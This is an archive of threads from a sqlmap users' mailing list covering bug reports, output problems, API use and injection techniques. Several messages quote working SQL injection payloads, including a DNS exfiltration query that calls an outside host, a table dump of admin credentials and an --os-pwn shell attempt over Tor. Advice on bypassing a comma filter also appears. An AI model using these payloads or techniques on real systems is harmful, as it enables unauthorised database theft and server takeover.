sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] --eval and Cookie values

[Miroslav S. <mir...@gm...>]

Hi.

It should be supported now :) [1]

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/ca44b23d2064d02833093cc8a1d0a75e446ec86a


On Wed, Jul 31, 2013 at 12:40 PM, Sebastian Nerz <seb...@sy...>wrote:

> Hi,
>
> is there a way to access (read/write) Cookie values in custom defined
> Python code (--eval)?
>
> Thanks :)
>
> All the best,
>
> Sebastian Nerz
>
>
>
> ------------------------------------------------------------------------------
> Get your SQL database under version control now!
> Version control is standard for application code, but databases havent
> caught up. So what steps can you take to put your SQL databases under
> version control? Why should you start doing it? Read more to find out.
> http://pubads.g.doubleclick.net/gampad/clk?id=49501711&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] --eval and Cookie values

[Sebastian N. <seb...@sy...>]

Hi,

is there a way to access (read/write) Cookie values in custom defined
Python code (--eval)?

Thanks :)

All the best,

Sebastian Nerz

Re: [sqlmap-users] UNION and then Blind AND ???

[Miroslav S. <mir...@gm...>]

Hi.

sqlmap is always trying to use fastest technique available, and in case
that something goes wrong it retries with slower ones.
In your case something went wrong with union and sqlmap residued to blind
technique.

Question is why. Can you please send a traffic file for that run (-t
traffic.txt --dump --fresh-queries -T ... -D ...). You don't have to let it
run for the whole run. I am only interested into first couple of requests.

Also,  you could try to establish the problematic column for that case by
using option -C ...

Kind regards,
Miroslav Stampar
On Jul 28, 2013 5:52 AM, "Carlos Silva" <r3...@r3...> wrote:

> Hi!
>
> I found an odd behavior on sqlmap. I throwed it and url where it found
> this:
> Place: GET
> Parameter: pub
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 6 columns
>     Payload: XXX=' OR '1'='1' UNION ALL SELECT
> NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL
> FROM DUAL--
>
>     Type: AND/OR time-based blind
>     Title: Oracle AND time-based blind (heavy query)
>     Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS
> T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD
>
> So, the best way to dump the DB would be to use the UNION query since it
> can retrieve the whole table at a time.
>
> Now, the funny thing is that it actually used this for the first 4 or 5
> tables, which are 5 or 6 columns wide, but then, on a table with only 3
> columns it didn't. It is now using a slow-moving AND boolean-based attack
> to dump the table char-by-char but I can't understand why. Any known reason
> for this? Or I'm just missing something?
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] UNION and then Blind AND ???

[Carlos S. <r3...@r3...>]

Hi!

I found an odd behavior on sqlmap. I throwed it and url where it found this:
Place: GET
Parameter: pub
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: XXX=' OR '1'='1' AND 5523=5523 AND 'YIrb'='YIrb

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: XXX=' OR '1'='1' UNION ALL SELECT
NULL,NULL,CHR(113)||CHR(97)||CHR(101)||CHR(98)||CHR(113)||CHR(69)||CHR(111)||CHR(119)||CHR(107)||CHR(115)||CHR(118)||CHR(118)||CHR(66)||CHR(98)||CHR(115)||CHR(113)||CHR(110)||CHR(109)||CHR(107)||CHR(113),NULL,NULL,NULL
FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: XXX=' OR '1'='1' AND 4237=(SELECT COUNT(*) FROM ALL_USERS
T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'DQxD'='DQxD

So, the best way to dump the DB would be to use the UNION query since it
can retrieve the whole table at a time.

Now, the funny thing is that it actually used this for the first 4 or 5
tables, which are 5 or 6 columns wide, but then, on a table with only 3
columns it didn't. It is now using a slow-moving AND boolean-based attack
to dump the table char-by-char but I can't understand why. Any known reason
for this? Or I'm just missing something?

Re: [sqlmap-users] Bug report

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/495


On Mon, Jul 22, 2013 at 11:03 AM, ✿ <kim...@gm...> wrote:

> Hi! I was trying to use metasploit when this error came up.
>
> sqlmap version: 1.0-dev
> Python version: 2.7
> Operating system: nt
> Command line: sqlmap.py -u **************************************
> --check-tor --
> tor --tor-port=9150 --tor-type=SOCKS5 --mobile --os-pwn --msf-path
> C:\metasploit
> \apps\pro\msf3
> Technique: ERROR
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 95, in main
>     start()
>   File "C:\sqlmap\lib\controller\controller.py", line 602, in start
>     e = getUnicode(e)
>   File "C:\sqlmap\lib\core\common.py", line 1950, in getUnicode
>     return unicode(value)  # encoding ignored for non-basestring instances
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 76:
> ordinal
>  not in range(128)
>
> [*] shutting down at 18:01:02
>
> -Vil
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Bug report

[✿ <kim...@gm...>]

Hi! I was trying to use metasploit when this error came up.

sqlmap version: 1.0-dev
Python version: 2.7
Operating system: nt
Command line: sqlmap.py -u **************************************
--check-tor --
tor --tor-port=9150 --tor-type=SOCKS5 --mobile --os-pwn --msf-path
C:\metasploit
\apps\pro\msf3
Technique: ERROR
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 95, in main
    start()
  File "C:\sqlmap\lib\controller\controller.py", line 602, in start
    e = getUnicode(e)
  File "C:\sqlmap\lib\core\common.py", line 1950, in getUnicode
    return unicode(value)  # encoding ignored for non-basestring instances
UnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 76:
ordinal
 not in range(128)

[*] shutting down at 18:01:02

-Vil

Re: [sqlmap-users] Oracle data retrieval over DNS

[Miroslav S. <mir...@gm...>]

Hi.

Well, both blind injection and dns exfiltration require usage of comma
character - because there is a need for extracting bits/characters/chunks
(SUBSTRC).

Nonetheless, that method you referenced would require a noticable work to
be done on a Oracle side. I would suggest you to try to use a manual dns
exfiltration approach without SUBSTRC (whole query response into the dns
request - and pray that it fits within the size limits)

Kind regards,
Miroslav Stampar


On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fod...@gm...>wrote:

> Heya,
>
> Sqlmap identifies an Oracle blind injection point, but commas are filtered
> so I get no data even when using --dns-domain.
>
> Even with --dns-domain there are substrings (,) in query
> ---
> AND ASCII(SUBSTRC((SELECT
> UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
> RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
> DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
> FROM DUAL),8,1))>914 AND (7100=7100)
> ---
>
> Is there a way to do the technique described on this page with sqlmap?
>
> http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
>
> M
>
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Oracle data retrieval over DNS

[Marcell F. <fod...@gm...>]

Heya,

Sqlmap identifies an Oracle blind injection point, but commas are filtered
so I get no data even when using --dns-domain.

Even with --dns-domain there are substrings (,) in query
---
AND ASCII(SUBSTRC((SELECT
UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
FROM DUAL),8,1))>914 AND (7100=7100)
---

Is there a way to do the technique described on this page with sqlmap?
http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/

M

Re: [sqlmap-users] Data retrieval problem - Question Marks

[Miroslav S. <mir...@gm...>]

Hi.

Please retry everything from the beginning (--flush-session) with
--text-only or --string. Please try to run without --threads (there are
cases when high number of connections cause problems at the web server
side).

Kind regards,
Miroslav Stampar
On Jul 16, 2013 6:30 PM, "Vinicius Da Loop" <vin...@gm...>
wrote:

>
> log:
>
> imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B
> --threads=10 --no-cast -T ilh_admin --dump
>
>     sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 13:22:41
>
> [13:22:41] [INFO] resuming back-end DBMS 'mysql'
> [13:22:41] [INFO] testing connection to the target URL
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: ref
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
> ---
> [13:22:41] [INFO] the back-end DBMS is MySQL
> web application technology: Apache
> back-end DBMS: MySQL 5
> [13:22:41] [WARNING] missing database parameter. sqlmap is going to use
> the current database to enumerate table(s) entries
> [13:22:41] [INFO] fetching current database
> [13:22:41] [INFO] retrieving the length of query output
> [13:22:41] [INFO] resumed: 22
>
> [sniped]
>
> [13:22:44] [INFO] retrieving the length of query output
> [13:22:44] [INFO] retrieved: 13
> [13:22:54] [INFO] retrieved: ?????????????
> [13:22:54] [INFO] retrieving the length of query output
> [13:22:54] [INFO] retrieved: 1
> [13:22:58] [INFO] retrieved: _
> [13:23:00] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [13:23:00] [INFO] retrieving the length of query output
> [13:23:00] [INFO] retrieved: 10
> [13:23:09] [INFO] retrieved: ??????????
> [13:23:09] [INFO] analyzing table dump for possible password hashes
> Database: hostl347
> Table: ilh_admin
> [1 entry]
> +----+------------+---------------+
> | id | pass       | admin         |
> +----+------------+---------------+
> |    | ?????????? | ????????????? |
> +----+------------+---------------+
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Data retrieval problem - Question Marks

[Vinicius Da L. <vin...@gm...>]

log:

imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B
--threads=10 --no-cast -T ilh_admin --dump

    sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover
tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 13:22:41

[13:22:41] [INFO] resuming back-end DBMS 'mysql'
[13:22:41] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: ref
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS
---
[13:22:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[13:22:41] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[13:22:41] [INFO] fetching current database
[13:22:41] [INFO] retrieving the length of query output
[13:22:41] [INFO] resumed: 22

[sniped]

[13:22:44] [INFO] retrieving the length of query output
[13:22:44] [INFO] retrieved: 13
[13:22:54] [INFO] retrieved: ?????????????
[13:22:54] [INFO] retrieving the length of query output
[13:22:54] [INFO] retrieved: 1
[13:22:58] [INFO] retrieved: _
[13:23:00] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[13:23:00] [INFO] retrieving the length of query output
[13:23:00] [INFO] retrieved: 10
[13:23:09] [INFO] retrieved: ??????????
[13:23:09] [INFO] analyzing table dump for possible password hashes
Database: hostl347
Table: ilh_admin
[1 entry]
+----+------------+---------------+
| id | pass       | admin         |
+----+------------+---------------+
|    | ?????????? | ????????????? |
+----+------------+---------------+

Re: [sqlmap-users] Output redirection

[Miroslav S. <mir...@gm...>]

You are running it from a cmd file. That's the problem of opening and
closing window. Please use command prompt. Sqlmap doesn't open new windows
for sure.

Log file is being filled only with usable data. If there was no SQLi found
the log file will be empty.

Bye
On Jul 14, 2013 3:58 AM, "Sumalee Kantawut" <ska...@gm...> wrote:

> Thanks for the quick answer.
>
> I've tried to run sqlmap from a cmd file:
>
> E:
> cd \SqlMap
> cmd /q /k E:\Python\Python-Portable.exe sqlmap.py -u ...
>
> Bu that doesn't prevent sqplmap from closing its window because sqlmap
> still opens its own console window.
>
> Why is the log file in the output folder empty?
>
> Thanks,
> Sumalee
>
>
>
> On 14.07.2013 03:22, Miroslav Stampar wrote:
>
>> Hi.
>>
>> Run sqlmap from a command prompt. You are probably running it by double
>> clicking.
>>
>> Kind regards,
>> Miroslav Stampar
>> On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:
>>
>>  Hi,
>>>
>>> I'm running sqlmap on Windows 7.
>>> Sqlmap closes its window after completing the job. The log file in the
>>> output folder is empty. So all output is lost. I can't redirect the
>>> output to a file because sqlmap opens its own window.
>>> Could you please tell me how to preserve the output?
>>>
>>> Regards,
>>> Sumalee
>>>
>>>
>>>
>>>
>>> ------------------------------**------------------------------**
>>> ------------------
>>> See everything from the browser to the database with AppDynamics
>>> Get end-to-end visibility with application monitoring from AppDynamics
>>> Isolate bottlenecks and diagnose root cause in seconds.
>>> Start your free trial of AppDynamics Pro today!
>>> http://pubads.g.doubleclick.**net/gampad/clk?id=48808831&iu=**
>>> /4140/ostg.clktrk<http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk>
>>> ______________________________**_________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.**sourceforge.net<sql...@li...>
>>> https://lists.sourceforge.net/**lists/listinfo/sqlmap-users<https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
>>>
>>>
>

Re: [sqlmap-users] Output redirection

[Sumalee K. <ska...@gm...>]

Thanks for the quick answer.

I've tried to run sqlmap from a cmd file:

E:
cd \SqlMap
cmd /q /k E:\Python\Python-Portable.exe sqlmap.py -u ...

Bu that doesn't prevent sqplmap from closing its window because sqlmap 
still opens its own console window.

Why is the log file in the output folder empty?

Thanks,
Sumalee



On 14.07.2013 03:22, Miroslav Stampar wrote:
> Hi.
>
> Run sqlmap from a command prompt. You are probably running it by double
> clicking.
>
> Kind regards,
> Miroslav Stampar
> On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:
>
>> Hi,
>>
>> I'm running sqlmap on Windows 7.
>> Sqlmap closes its window after completing the job. The log file in the
>> output folder is empty. So all output is lost. I can't redirect the
>> output to a file because sqlmap opens its own window.
>> Could you please tell me how to preserve the output?
>>
>> Regards,
>> Sumalee
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> See everything from the browser to the database with AppDynamics
>> Get end-to-end visibility with application monitoring from AppDynamics
>> Isolate bottlenecks and diagnose root cause in seconds.
>> Start your free trial of AppDynamics Pro today!
>> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>

Re: [sqlmap-users] Output redirection

[Miroslav S. <mir...@gm...>]

Hi.

Run sqlmap from a command prompt. You are probably running it by double
clicking.

Kind regards,
Miroslav Stampar
On Jul 13, 2013 8:29 PM, "Sumalee Kantawut" <ska...@gm...> wrote:

> Hi,
>
> I'm running sqlmap on Windows 7.
> Sqlmap closes its window after completing the job. The log file in the
> output folder is empty. So all output is lost. I can't redirect the
> output to a file because sqlmap opens its own window.
> Could you please tell me how to preserve the output?
>
> Regards,
> Sumalee
>
>
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

[sqlmap-users] Output redirection

[Sumalee K. <ska...@gm...>]

Hi,

I'm running sqlmap on Windows 7.
Sqlmap closes its window after completing the job. The log file in the 
output folder is empty. So all output is lost. I can't redirect the 
output to a file because sqlmap opens its own window.
Could you please tell me how to preserve the output?

Regards,
Sumalee

Re: [sqlmap-users] bug? thx

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it fixed now [1].

Kind regards,
Miroslav Stampar

[1]
https://github.com/sqlmapproject/sqlmap/commit/dc1623a40fc35ce11b452f682476460f0c613910


On Thu, Jul 11, 2013 at 6:48 AM, 沸水浮冰 <sf...@gm...> wrote:

> [00:44:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev-1ae68b9, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-1ae68b9
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -r lulu_1216.txt --level=5 --risk=3
> --tamper=between --identify-waf -p email -v 3
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/root/sqlmap-dev/lib/controller/controller.py", line 469, in start
>     check = heuristicCheckSqlInjection(place, parameter)
>   File "/root/sqlmap-dev/lib/controller/checks.py", line 751, in
> heuristicCheckSqlInjection
>     payload = agent.payload(place, parameter, newValue=payload)
>   File "/root/sqlmap-dev/lib/core/agent.py", line 145, in payload
>     retVal = re.sub(r"(\A|\b)%s=%s" % (parameter, origValue), "%s=%s" %
> (parameter, self.addPayloadDelimiters(newValue)), paramString)
>   File "/usr/lib/python2.7/re.py", line 151, in sub
>     return _compile(pattern, flags).sub(repl, string, count)
>   File "/usr/lib/python2.7/re.py", line 242, in _compile
>     raise error, v # invalid expression
> error: unbalanced parenthesis
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] bug? thx

[沸水浮冰 <sf...@gm...>]

[00:44:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev-1ae68b9, retry
your run with the latest development version from the GitHub repository. If
the exception persists, please send by e-mail to '
sql...@li...' or open a new issue at '
https://github.com/sqlmapproject/sqlmap/issues/new' with the following text
and any information required to reproduce the bug. The developers will try
to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-1ae68b9
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap.py -r lulu_1216.txt --level=5 --risk=3
--tamper=between --identify-waf -p email -v 3
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 95, in main
    start()
  File "/root/sqlmap-dev/lib/controller/controller.py", line 469, in start
    check = heuristicCheckSqlInjection(place, parameter)
  File "/root/sqlmap-dev/lib/controller/checks.py", line 751, in
heuristicCheckSqlInjection
    payload = agent.payload(place, parameter, newValue=payload)
  File "/root/sqlmap-dev/lib/core/agent.py", line 145, in payload
    retVal = re.sub(r"(\A|\b)%s=%s" % (parameter, origValue), "%s=%s" %
(parameter, self.addPayloadDelimiters(newValue)), paramString)
  File "/usr/lib/python2.7/re.py", line 151, in sub
    return _compile(pattern, flags).sub(repl, string, count)
  File "/usr/lib/python2.7/re.py", line 242, in _compile
    raise error, v # invalid expression
error: unbalanced parenthesis

Re: [sqlmap-users] Help: Sqlmap Api, resumed scans, retrieve json data

[Miroslav S. <mir...@gm...>]

Hi Mehmet.

It's not quite clear what's the problem here (is it sending of lengthy
resuming strings in subsequent requests?). Can you please give more
information?

Kind regards,
Miroslav Stampar


On Tue, Jul 9, 2013 at 5:20 AM, <ma...@gm...> wrote:

> Dear All,
>
> I've the following situation with the api and need your help.
>
> I can request for database and table enumerations and can use their
> values as dictionaries in python.
> The value looks like that:
> "value": {
> "user_login": {
> "length": 10,
> "values":["root", "admin"]
>
>                        }
>
>               }
>
>  Afterwards it's once possible to start an enumeration for columns
> All subsequent requests supply strings as value.
> Likewise I've the case when I want dump more then one table.
>  And the values look like that:
>
> "value": "{u'user_login': {u'length': 10, u'values': [u'root', u'admin']},
> u'ID': {u'length': 2, u'values': [u'1', u'2']}, u'__infos__': {u'count': 2,
> u'table': u'wpx_users', u'db': u'wp35'}}
> [00:07:32] [INFO] resumed: \"term_id\",\"bigint(20) unsigned\"\r\n
> [00:07:32] [INFO] resumed: \"name\",\"varchar(200)\"\r\n
> ...
> }
>
> In this case I tried with new task id, but the disadvantage is that
> it takes a long time until each table dump is done.
> I hope for your help and wish there is a possibility.
> I apologize for my bad English. =)
>
> Yours faithfully
>
> Mehmet Öztürk
>
>
> ------------------------------------------------------------------------------
> See everything from the browser to the database with AppDynamics
> Get end-to-end visibility with application monitoring from AppDynamics
> Isolate bottlenecks and diagnose root cause in seconds.
> Start your free trial of AppDynamics Pro today!
> http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Help: Sqlmap Api, resumed scans, retrieve json data

[<ma...@gm...>]

<html><head></head><body><div style="font-family: Verdana;font-size: 12.0px;"><div>Dear All,</div>

<div>&nbsp;</div>

<div>I&#39;ve&nbsp;the following situation with the api and need your&nbsp;help.</div>

<div>&nbsp;</div>

<div>I can&nbsp;<span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">request&nbsp;for&nbsp;database&nbsp;and&nbsp;table&nbsp;enumerations and can use&nbsp;their values as dictionaries&nbsp;in python.</span></div>

<div><span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">The value looks like that:</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;value&quot;: {</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;user_login&quot;: {</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;length&quot;: 10,</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;values&quot;:[</span><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;root&quot;, </span><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;admin&quot;</span><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">]</span></div>

<div>
<pre style="line-height: normal;">                       }</pre>

<div>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }</div>

<div>&nbsp;</div>
</div>

<div><span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">Afterwards it&#39;s </span>once<span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">&nbsp;possible to start an enumeration for columns&nbsp;</span></div>

<div><span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">All subsequent requests supply strings as value.</span></div>

<div><span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">Likewise I&#39;ve the case when I want dump more then one table.</span></div>

<div>
<div><span style="font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px; line-height: 1.6em;">And the values look like that:</span><br/>
&nbsp;</div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">&quot;value&quot;: &quot;{u&#39;user_login&#39;: {u&#39;length&#39;: 10, u&#39;values&#39;: [u&#39;root&#39;, u&#39;admin&#39;]}, u&#39;ID&#39;: {u&#39;length&#39;: 2, u&#39;values&#39;: [u&#39;1&#39;, u&#39;2&#39;]}, u&#39;__infos__&#39;: {u&#39;count&#39;: 2, u&#39;table&#39;: u&#39;wpx_users&#39;, u&#39;db&#39;: u&#39;wp35&#39;}}</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">[00:07:32] [INFO] resumed: &#92;&quot;term_id&#92;&quot;,&#92;&quot;bigint(20) unsigned&#92;&quot;&#92;r&#92;n</span></div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">[00:07:32] [INFO] resumed: &#92;&quot;name&#92;&quot;,&#92;&quot;varchar(200)&#92;&quot;&#92;r&#92;n</span></div>

<div>...</div>

<div><span style="white-space: pre-wrap; line-height: normal; font-family: Verdana, sans-serif, Arial, &#39;Trebuchet MS&#39;; font-size: 13px;">}</span></div>

<div>&nbsp;</div>

<div>In this case I&nbsp;tried with new task id, but the disadvantage is&nbsp;that it&nbsp;takes a long time until each table dump&nbsp;is done.</div>

<div>I hope for your help and wish&nbsp;there is a possibility.</div>

<div>I apologize for my bad English. =)</div>

<div>&nbsp;</div>

<div>Yours faithfully</div>

<div>&nbsp;</div>

<div>Mehmet &Ouml;zt&uuml;rk</div>
</div></div></body></html>

Re: [sqlmap-users] CRITICAL - unhandled exception in sqlmap/1.0-dev-5882ab5 (current trunk)

[Miroslav S. <mir...@gm...>]

Hi Jacco.

Thank you for your report and find it fixed with the latest commit.

Kind regards,
Miroslav Stampar

[1] p.s. if you are searching for tables containing user in it's name try
first with "--search -T user"


